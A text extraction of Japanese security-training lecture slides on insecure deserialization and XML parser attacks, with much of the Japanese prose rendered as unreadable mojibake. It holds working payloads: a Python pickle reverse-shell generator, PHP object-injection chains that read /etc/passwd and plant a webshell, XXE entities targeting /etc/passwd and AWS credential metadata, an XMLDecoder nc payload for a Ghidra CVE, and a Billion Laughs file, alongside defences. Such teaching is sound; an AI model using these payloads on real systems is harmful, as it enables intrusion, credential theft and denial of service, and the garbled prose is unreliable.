  52.  બߟ՝୊&ղઆ w λʔήοτͷ୺຤͔Β߈ܸऀ͕଴ͪड͚͍ͯΔ୺຤΁ͱ઀ଓ͠ʹ͍͘͜ͱ Ͱɺ߈ܸऀ͕λʔήοτͷ୺຤্Ͱಈ࡞͢ΔγΣϧΛૢ࡞Ͱ͖ΔΑ͏ʹ͢Δ ςΫχοΫΛϦόʔεγΣϧͱݺͿ ϦόʔεγΣϧͱ͸ ԿΒ͔ͷํ๏ͰϦόʔεγΣϧΛߦ͏ίʔυΛ࣮ߦͤ͞Δ ߈ܸऀ͕଴ͪड͚Δ୺຤ʹ઀ଓ ೚ҙίʔυΛ࣮ߦ

  53.  બߟ՝୊&ղઆ w αʔό্Ͱ೚ҙίʔυ࣮ߦʹ੒ޭͨ͠ͱͯ͠΋݁Ռ͕Ϩεϙϯε΍6*্ʹग़ͯ ͘Δͱ͸ݶΒͳ͍ɻ w ϦόʔεγΣϧʹΑͬͯ೚ҙίʔυ࣮ߦͷ݁ՌΛ֬ೝͰ͖Δ ϦόʔεγΣϧͷ༻్ ೚ҙίʔυ࣮ߦͰ͖Δ͔΋͠Εͳ͍ίʔυ

  54.  બߟ՝୊&ղઆ w ୈҰҾ਺ʹࢦఆ͞Εͨ#BTFจࣈྻΛσίʔυ্ͨ͠ͰVOQJDLMFԽ͍ͯ͠Δ w QJDLMFԽ্ͨ͠Ͱ#BTFʹΤϯίʔυͨ͠จࣈྻΛࢦఆ͢Δ͜ͱͰ VOQJDLMF࣌ʹੜ੒͞ΕΔΦϒδΣΫτΛ੍ޚͰ͖Δ w ϚδοΫϝιουΛ࢖ͬͯϦόʔεγΣϧΛੜ੒͢ΔίʔυΛ࣮ߦ͢Ε͹ ղ͚Δ

    ํ਑

  55. બߟ՝୊&ղઆ  #!/usr/bin/env python3 # coding: UTF-8 import pickle import

    socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒

  56. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ରࡦ w ۃྗγϦΞϥΠζσγϦΞϥΠζΛߦΘͳ͍Α͏ʹ͢Δ w ୅ΘΓʹ+40/΍:".-ͳͲͷϑΥʔϚοτΛར༻͢Δ w γϦΞϥΠζσγϦΞϥΠζΛߦ͏ඞཁ͕͋Δ৔߹͸ɺσδλϧॺ໊Λ෇༩ ͠ɺվ͟ΜͰ͖ͳ͍Α͏ʹ͢Δ 

  57. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου

    w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏ 

  58. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 1)1ಛ༗ͷςΫχοΫ w ϚδοΫϝιουΛ࣋ͭΫϥεΛ௨ͯ͡௚઀͸࣮ߦͰ͖ͳ͍ϝιουΛ ࣮ߦ͢Δ߈ܸख๏ w ΦϒδΣΫτͷϓϩύςΟʢΫϥεͷϝϯόม਺ʣΛ੍ޚ͠ɺ ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ w λʔήοτ಺෦ͷίʔυΛ࠶ར༻͢Δ$PEF3FVTF"UUBDLͷҰछ

    w ଞʹ͸301ɺ3FUVSOJOUPMJCD͕͋Δ 

  59. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ  Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ

    ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ

  60. 1)1ಛ༗ͷςΫχοΫ  class Example { private $obj; function __construct() {

    // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ

  61. 1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w

    ͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0,  class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ

  62. 1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ  <?php class CodeSnippet

    { private $code = "phpinfo();"; } class Example { private $obj; function __construct() { $this->obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}

  63. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ w ࣮ࡍʹ1SPQFSUZ0SJFOUFE1SPHSBNNJOHΛ΍Δʹ͸γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛฤूͨ͘͠ͳΔ͜ͱ΋͋Δ w গ͚ͩ͠ฤू͍ͨ͠৔߹ɺίʔυ͔Βੜ੒͍ͯͯ͠͸໘౗ʜ w ਓྗͰಡΊΔΑ͏ʹͳ͓ͬͯ͘ͱϦΫΤετத͔ΒγϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛγϡοͱݟ͚ͭΒΕͯศརͳ͜ͱ΋͋Δ͔΋ʜ

    

  64. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ <?php class Seccamp { private $year =

    0; public function set_year($year){ $this->year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}

  65. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;} 0CKFDUΛࣔ͢0 จࣈ਺ Ϋϥε໊ ϓϩύςΟͷ਺ 4USJOHΛࣔ͢T จࣈ਺

    จࣈྻ *OUFHFSΛࣔ͢J ਺஋

  66. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF

    w EPVCMF w EWBMVF  IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^

  67. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 301ʹࣅ͍ͯΔ w ίʔυͷஅยΛগ࣮ͣͭ͠ߦ͍͖ͯ͠ɺ࠷ऴతʹ໨ඪΛୡ੒͢Δͱ͜Ζ͕ 301ʹࣅ͍ͯΔ w όΠφϦʹର͢ΔFYQMPJUςΫχοΫͷߟ͑ํ͕8FCͷੈքʹԠ༻͞Ε͍ͯΔ Α͏Ͱɺ͓΋͠Ζ͍ʂʂ 

  68. ԋश0CKFDU*OKFDUJPOʢ෼ʣ w ࣍ͷίϚϯυΛೖྗ͢Δͱ%PDLFSίϯςφ্ཱ͕͕ͪΓ·͢  $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd

    seccamp2021-b5 $ cd exercise/object-injection/ $ docker-compose build $ docker-compose up

  69. w IUUQMPDBMIPTUΛϒϥ΢βͰ։͘͜ͱͰԋश؀ڥʹ ΞΫηεͰ͖·͢ ԋश0CKFDU*OKFDUJPOʢ෼ʣ 

  70. ԋशղઆ0CKFDU*OKFDUJPO w ߨ࣮ٛࢪ࣌ʹ͸Ξοϓϩʔυ͍ͯ͠ͳ͔ͬͨ-FWFMɺ-FWFMΛ ղͨ͘ΊͷεΫϦϓτ͸(JU)VCϦϙδτϦʹ্͛ͯ͋Γ·͢ʂ w IUUQTHJUIVCDPNULNSVTFDDBNQCUSFFNBTUFSFYFSDJTF PCKFDUJOKFDUJPOTPMWFS 

  71. ԋशղઆ-FWFM 

  72. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛ @@XBLFVQϝιουͰಡΈऔ͍ͬͯΔ w PCKFDUύϥϝʔλͰγϦΞϥΠζ͞ΕͨΦϒδΣΫτΛड͚औΓ VOTFSJBMJ[F͍ͯ͠Δ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUFJOHΫϥεΛγϦΞϥΠζͨ͠΋ͷ ΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUDQBTTXE͕ಡΈऔΕͦ͏ʂʂ

     ํ਑

  73. ԋशղઆ-FWFM 

  74. ԋशղઆ-FWFM 

  75. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛSFBEϝιουͰ ಡΈऔ͍ͬͯΔ w ͨͩ͠ɺ-FWFMͱҧͬͯ4FUUJOHΫϥε಺Ͱ͸ϚδοΫϝιου͕ͳ͍ʜ w .BJOΫϥεͰ͸ϚδοΫϝιου಺Ͱϝϯόม਺pMFͷSFBEϝιουΛ࣮ߦ͢Δ ͕pMFʹ͸OVMM͕ࢦఆ͞Ε͍ͯΔʜ w

    QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUJOHΫϥεΛ.BJOΫϥεͷϝϯόม਺ pMFʹࢦఆ͠ɺγϦΞϥΠζͨ͠΋ͷΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUD QBTTXE͕ಡΈऔΕͦ͏ʂʂ  ํ਑

  76. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { $content = file_get_contents($this->path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  77. ԋशղઆ-FWFM 

  78. ԋशղઆ-FWFM 

  79. ԋशղઆ-FWFM w େମ-FWFMͱಉ͕ͩ͡ɺ4FUUJOHΫϥε಺Ͱ͸TZTUFNؔ਺Λ࢖͍ͬͯΔ w ೚ҙίʔυ࣮ߦͷνϟϯεʂʂʂ w DBUΛ࣮ߦͨ͠ޙʹͰίϚϯυΛ۠੾ͬͯFDIPίϚϯυͰXFCTIFMMͱͯ͠ ಈ࡞͢ΔQIQϑΝΠϧΛॻ͖ࠐΈͰ͖Δ w DBUDPOpHKTPOFDIPa

    QIQTZTUFN @(&5<DNE>  aBQIQ w 1BUIʹˢ͕࣮ߦ͞ΕΔΑ͏ͳจࣈྻΛࢦఆ͢ΔͱΑͦ͞͏ʂʂʂ  ํ਑

  80. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { system("cat " . $this->path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  81. ԋशղઆ-FWFM 

  82. ԋशղઆ-FWFM 

  83. ͜͜·Ͱͷ·ͱΊ w ༷ʑͳϓϩάϥϛϯάݴޠʹσγϦΞϥΠζγϦΞϥΠζͷ࢓૊Έ͕࣮૷͞ Ε͍ͯΔ w Ϣʔβ͕ࣗ༝ʹγϦΞϥΠζ͞ΕͨσʔλΛࢦఆͰ͖Δঢ়گ͸ةݥ w ϚδοΫϝιουΛ༻͍Ε͹༰қʹ3$&ʹ·Ͱ࣋ͪࠐΊΔ 

  84. ٳܜʢ෼ʣ

  85. ୈ̏ষɿ 9.-ύʔαΛૂͬͨ߈ܸ

  86. 9.-ͷ༻్ 9.-ͱ͸ w 9.-ʢF9UFOTJCF.BSLVQ-BOHVBHFʣ͸ϚʔΫΞοϓݴޠͷͻͱͭ w ϚʔΫΞοϓݴޠςΩετϑΝΠϧͷதʹɺςΩετͱಛఆͷه߸Λ ૊Έ߹Θͤɺ෇Ճ৘ใΛهड़ͨ͠΋ͷɻ)5.-ͳͲ w ֤छઃఆϑΝΠϧͷϑΥʔϚοτʹͳ͍ͬͯΔ͜ͱ͕ଟ͍ w

    "OESPJE.BOJGFTUYNMͳͲ 

  87. 9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT

    lectures (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ

  88. 9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT lectures

    (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%

  89. 9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠   w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ  %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ <?xml

    version="1.0"?> <!DOCTYPE lectures[]> <?xml version="1.0"?> <!ENTITY title "झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ">

  90. 9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ  *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY xml-file SYSTEM "http://example.com/sample.xml"> <!ENTITY txt-file SYSTEM “file:///path/to/file.txt“> ]> <demo> <file>&xml-file</file> <file>&txt-file</file> </demo>

  91. 9.-FYUFSOBMFOUJUZJOKFDUJPO ֓ཁ w Ϣʔβ͕ࢦఆͨ͠9.-ϑΝΠϧΛॲཧ͢ΔΞϓϦέʔγϣϯ͕͋Δͱ͢Δ w &YUFSOBM&OUJUZΛ༻͍ͯϩʔΧϧͷϑΝΠϧɺ಺෦ωοτϫʔΫͷΞυϨε Λࢦఆͨ͠9.-ϑΝΠϧΛΞϓϦέʔγϣϯʹॲཧͤ͞Δ͜ͱͰ ຊདྷ͸Ϣʔβ͕஌Γಘͳ͍৘ใΛऔಘͰ͖Δ w ͜ͷ߈ܸख๏͸9.-&YUFSOBM&OUJUZʢ99&ʣJOKFDUJPOͱݺ͹ΕΔ

     <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY txt-file SYSTEM “file:///etc/passwd“> <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]>

  92. 9.-FYUFSOBMFOUJUZJOKFDUJPO 443'΁ͭͳ͛Δ w ݱ୅ͷ8FCΞϓϦέʔγϣϯ͸αʔό̍ͭͰಈ͍͍ͯΔ͜ͱ͸গͳ͘ɺ༷ʑ ͳαʔό͕૊Έ߹Θͬͯ͞ಈ͍͍ͯΔ w ຊདྷϢʔβ͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦৘ใʹΞΫηε͢Δ߈ܸ͕443' w ֎෦͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦ωοτϫʔΫ্ʹଘࡏ͍ͯ͠Δαʔό͕ ର৅ʹͳΔ

    

  93. 9.-FYUFSOBMFOUJUZJOKFDUJPO &$ͷNFUBEBUBͷऔಘ w "84&$Ͱ͸಺෦ΞυϨεʹΫϨσϯγϟϧΛอ͍࣋ͯ͠Δ w IUUQTMBUFTUNFUBEBUBJBNTFDVSJUZDSFEFOUJBMT w গ͠લ·Ͱɺ&YUFSOBM&OUJUZΛ্͔ͭͬͯهΞυϨεʹΞΫηε͢Δͱ FYUFSOBMFOUJUZJOKFDUJPO͔Β443'ʹൃలͤ͞ΒΕͨ 

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]> <demo> &aws-metadata </demo>

  94. 9.-FYUFSOBMFOUJUZJOKFDUJPO *.%4WʹΑΔ&$ͷ؇࿨ࡦ w ݱ୅Ͱ΋&$্ͰʹΫϨσϯγϟϧ͸ଘࡏ͢Δ͕ ؆୯ʹ͸ΞΫηεͰ͖ͳ͍ w ࣄલʹ165ϦΫΤετͰऔಘͨ͠τʔΫϯ͕ඞਢʹͳͬͨ w 9.-ͷFOUJUZ͔Β͸165ϦΫΤετ͸ඈ͹ͤͳ͍ͨΊɺ FYUFSOBMFOUJUZJOKFDUJPO͔ΒΫϨσϯγϟϧΛऔಘ͢Δ͜ͱ͸Ͱ͖ͳ͍

    w (PQIFSϓϩτίϧΛ࢖͑͹*.%4W͕༗ޮͰ΋ΫϨσϯγϟϧΛऔಘՄೳ͕ͩ 9.-ύʔαͱؔ܎ͳ͍࿩ʹͳͬͯ͠·͏ͷͰ͜͜Ͱ͸ׂѪ 

  95. 9.-FYUFSOBMFOUJUZJOKFDUJPO ରࡦ w 9.-ϑΝΠϧ͸ػೳ͕๛෋Ͱѻ͍͕Ή͔͍ͣ͠ͷͰ+40/ϑΝΠϧͳͲͷ ଞͷϑΝΠϧϑΥʔϚοτΛࢦఆ͢Δ w 9.-ύʔα͕%5%Λॲཧ͠ͳ͍Α͏ʹػೳΛ੍ݶ͢Δ 

  96. (IJESBͰͷྫ ࣄલ՝୊̍ w (IJESBʹ͸99&ͷ੬ऑੑ͕ͭ͋Δʢ೥݄࣌఺ʣ w $7& w $7& w ࠶ݱ؀ڥΛ࡞੒ͯ͠ɺ࣮ࡍʹ੬ऑੑΛ߈ܸͯ͠΋Β͏՝୊Λग़͍ͯ͠·ͨ͠

    

  97. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w ϓϩδΣΫτ৘ใΛอଘ͍ͯ͠ΔϓϩδΣΫτϑΝΠϧʢ HQSʣͷ಺෦ʹ 9.-ϑΝΠϧʢQSPKFDUQSQʣ͕ଘࡏ͢Δ w QSPKFDUQSQΛύʔε͢Δࡍʹ99&͕ՄೳͰ͋ͬͨ 

    ࣄલ՝୊ղઆ

  98. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding=“UTF-8”?> <!DOCTYPE aaa

    [ <!ENTITY % dtd SYSTEM “http://localhost:5000/xxe”> %dtd; ]> <FILE_INFO> <BASIC_INFO> <STATE NAME="OWNER" TYPE=“string” VALUE=“tkmru” /> </BASIC_INFO> </FILE_INFO>

  99. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w (IJESBʹ͸σϑΥϧτͰ͸༗ޮʹͳ͍ͬͯͳ͍ɺ࣮ݧతͳػೳ͕ଘࡏ͢Δ w 9.-ϑΝΠϧʹهࡌ͞ΕͨύλʔϯͰόΠφϦ಺Λݕࡧ͢Δ 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹ੬ऑੑ͕ଘࡏͨ͠  ࣄલ՝୊ղઆ

  100. $7& w $PEF#SPXTFSͷ'JMFϝχϡʔ͔Β$POpHVSFʜΛબ୒͢Δͱ $POpHVSF&YQFSJNFOUBM1MVHJOT΢Οϯυ΢͕։͔ΕΔ w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹνΣοΫΛ͍ΕΔͱର৅ػೳ͕ ༗ޮʹͳΔ  ࣄલ՝୊ղઆ

  101. $7& w 8JOEPX'VODUJPO#JU1BUUFSOT&YQMPSFSΑΓμΠΞϩάΛग़ͤΔ w 3FBE9.-'JMFTϘλϯΛΫϦοΫ͢Δ͜ͱͰ9.-ϑΝΠϧΛಡ·ͤΒΕΔ  ࣄલ՝୊ղઆ

  102. $7& w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹಡ·ͤΔ9.-ϑΝΠϧΛੜ੒͢Δ ඞཁ͕͋Δɻ w 4DSJQU.BOBHFS͔Β%VNQ'VODUJPO1BUUFSO*OGP4DSJQUΛ࣮ߦ͢Δͱ બ୒͍ͯ͠Δؔ਺ͷ๯಄ͷػցޠ΍ΞυϨεͳͲͷ৘ใΛهͨ͠9.-ϑΝΠ ϧ͕ग़ྗ͞ΕΔ w ग़ྗ͞Εͨ9.-Λฤूͯ͠ಡΈࠐΉ͜ͱͰ99&Λߦ͑Δ

     ࣄલ՝୊ղઆ

  103. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding="UTF-8"?> <java version="11.0.9"

    class="java.beans.XMLDecoder"> <object class="ghidra.bitpatterns.info.FileBitPatternInfo"> <void property="ghidraURL"> <string>TODO: url</string> </void> <void property="languageID"> <string>x86:LE:64:default</string> </void> ʢলུʣ <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 5000</string> </void> </object> </java>

  104. ͜͜·Ͱ͸Α͘ղઆ͞Ε͍ͯΔ࿩ 9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏ w 99&͸̎ͭʹ෼ྨͰ͖Δ w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w 99&ͷଞʹ΋9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏͕͋Δ

    w #JMMJPOMBVHITʢ&YQPOFOUJBMFOUJUZFYQBOTJPOʣ w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w %FDPNQSFTTJPO#PNCͳͲ 

  105. 1ZUIPOΛ࢖ͬͯղઆ͠·͢ʂ w 1ZUIPOʹ͸9.-ύʔα͕ඪ४ϥΠϒϥϦͱͯ͠ଟ਺උΘ͍ͬͯΔ w ̍ͭͷݴޠͰෳ਺ͷ9.-ύʔαΛର৅ʹ؆୯ʹ1P$Λॻ͚ΔͨΊ ղઆʹ޲͍͍ͯΔ  ଞͷ9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏

  106. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ 1ZUIPOެࣜαΠτهࡌͷඪ४ϥΠϒϥϦͨͪ  IUUQTEPDTQZUIPOPSHMJCSBSZYNMIUNMYNMWVMOFSBCJMJUJFT ͖ͬ͞ղઆͨ͠99&

  107. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  108. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ w 1ZUIPOͷஶ໊ͳ9.-ϥΠϒϥϦͷϥούʔ w ηΩϡΞʹ9.-Λѻ͏ػೳΛ෇Ճͯ͘͠ΕΔ w JNQPSUจΛࠩ͠ସ͑Δ͚ͩͰηΩϡΞʹͳͬͯศར  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  109. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ %FGVTFEYNMͷ3&"%.&ʹ͸΋ͬͱৄ͍͠ද͕هࡌ͞Ε͍ͯΔ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  110. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  111. #JMMJPO-BVHIT 9.-ʹΑΔ%P4߈ܸ w ΤϯςΟςΟΛ܁Γฦ͠ࢀরͤ͞Δ͜ͱʹΑͬͯ$16΁ͷෛՙɺϝϞϦফඅ ྔΛ্͛Δ%P4߈ܸ w αʔό΁େྔͷΞΫηεΛߦ͍ಈ࡞Λෆ҆ఆʹͤ͞Δͷ͕%P4߈ܸͩͱ ޡղ͞Ε͕ͪ w ΞϓϦέʔγϣϯͷಈ࡞͕ෆՄೳʹͳΔΑ͏ͳɺ

    ҟৗʹಈ࡞ΛҾ͖ى͜͢ͷ͕%P4߈ܸͰ͋ͬͯखஈ͸ԿͰ΋ྑ͍ w 9.-CPNC΍FYQPOFOUJBMFOUJUZFYQBOTJPO߈ܸͱ΋ݺ͹ΕΔ 

  112. #JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ  <?xml version="1.0"?> <!DOCTYPE

    lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

